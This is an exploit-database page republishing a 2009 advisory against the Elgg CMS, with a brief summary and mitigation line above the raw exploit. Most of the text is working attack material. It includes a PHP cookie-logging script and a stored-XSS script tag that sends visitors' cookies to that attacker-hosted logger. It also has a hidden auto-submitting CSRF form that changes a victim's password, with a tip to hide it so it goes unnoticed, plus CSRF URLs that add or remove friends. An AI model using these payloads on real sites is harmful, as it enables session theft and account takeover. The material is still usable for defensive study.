CMS Elgg - exploit.company

vendor:

Elgg

by:

ThE Lorddemon

8,8

CVSS

HIGH

Cross-Site Scripting (XSS), Cross-Site Request Forgery (CSRF), Password Change

79, 352, 863

CWE

Product Name: Elgg

Affected Version From: 1.00

Affected Version To: 1.00

Patch Exists: Unknown

Related CWE: N/A

CPE: a:elgg:elgg

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Web

Unknown

CMS Elgg <1.00 (XSS;CSRF;Cambia Password)Multiple Remote Vulnerabilities

A vulnerability in CMS Elgg <1.00 allows an attacker to remotely change the password of a user by creating a new topic and editing it with a malicious script. The script can be used to store cookies and redirect the user to a page with a form that contains the new password. The form is then automatically submitted, allowing the attacker to change the password of the user.

Mitigation:

Ensure that all user input is properly sanitized and validated. Use a strong password policy and two-factor authentication.

Source

Exploit-DB raw data:

###################################################################################
[+] CMS Elgg <1.00 (XSS;CSRF;Cambia Password)Multiple Remote Vulnerabilities
[+] Discovered By ThE Lorddemon  lorddemon@zonartm.org
[+] Vendor:http://elgg.org/
[+] Greetings: Project MEMI-Bolivia, OpTix, RTM security Group http://zonartm.og
###################################################################################
	
Change Password Remotely:
+++++++++++++++++++++++++
1) You Must Register In ThE site.
2) Login
3) Create a new topic and then edit
	http://www.sitiosocial.com/_templates/
 	
Edit the new topic (Template) have the option to insert HTML, JavaScript
##################################################################################
Exploit& HTML Injection

###Cookie Grabber#### 
[+] Discovered By ThE Lorddemon
[+] Vendor:http://elgg.org/
##################################################################################
PoC
--
Script to store cookies
 <?php
 $cookie = $_GET['cookie'];
 $log = fopen("log.txt", "a");
 fwrite($log, $cookie ."\n");
 fclose($log);
 ?>
uploading to a host.Save as cookie.php

[+]Exploit:
   -------
1) Register in The SIte
2) add to the Template
<script language='Javascript' src='http://localhost/cookie.php?cookie='+document.cooke></script>

The victim would be anyone who comes to your blog.

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
###Change Pasword#### 
[+] Discovered By ThE Lorddemon lorddemon@zonartm.org 
[+] http://zonartm.org
[+] Vendor:http://elgg.org/
#######################################################################################################

1) Register in The SIte
2) add to the Template

<body onload="document.forms.g.submit();">

<iframe name="my_frame" ALING="BOTTOM"  scrolling=no width=1 heigth=1></iframe>

<form method="POST" target="my_frame" action="http://www.sitiosocial.com/_userdetails/index.php" name="g" id="g">
<input type=hidden name="name" value="">
<input type=hidden name="email" value="">
<input type=hidden name="moderation" value="no">
<input type=hidden name="publiccoments" value="no">
<input type=hidden name="receivenotifications" value="no">
<input type=hidden name="password1" value="password">   <------ Eye with this
<input type=hidden name="password2" value="password">   <------ Eye with this
<input type=hidden name="flag[commentwall_access]" value="LOGGED_IN">
<input type=hidden name="lang" value="">
<input type=hidden name="flag[sidebarsidebar-profile]" value="yes">
<input type=hidden name="flag[sidebarsidebar-communities]" value="yes">
<input type=hidden name="flag[sidebarsidebar-blog]" value="yes">
<input type=hidden name="flag[sidebarsidebar-friends]" value="yes">
<input type=hidden name="visualeditor" value="yes">
<input type=hidden name="action" value="userdetails:update">
<input type=hidden name="id" value="id_victima">               <---------Eye with this
<input type=hidden name="profile_id" value="id_victima">       <---------Eye with this
</form>
	 	
It is better to send all the form inside a Div tag to pass unnoticed
	
The victim would be the user with the id.
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
###You Be More Popular, or remove the victim to Friends#### 
[+] Discovered By ThE Lorddemon lorddemon@zonartm.org 
[+] http://zonartm.org
[+] Vendor:http://elgg.org/
#################################################################################################################

1) Register in The SIte
2) Add to the Template

http://www.sitioSocial.com/mod/friend/index.php?friends_name=[vacio]&action=friend&friend_id=[tu id]

viewing parameters from the viewpoint of the attacker.

Friends_name=is the user name who made you want to be your friend. (may be empty)
Action= friend or unfriend.
Friend_id=User ID. who is performing the action
	
You can also remove it with friends cuanquier user.

http://www.sitioSocial.com/mod/friend/index.php?friends_name=[vacio]&action=Unfriend&friend_id=[id_victima]

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

# milw0rm.com [2009-06-22]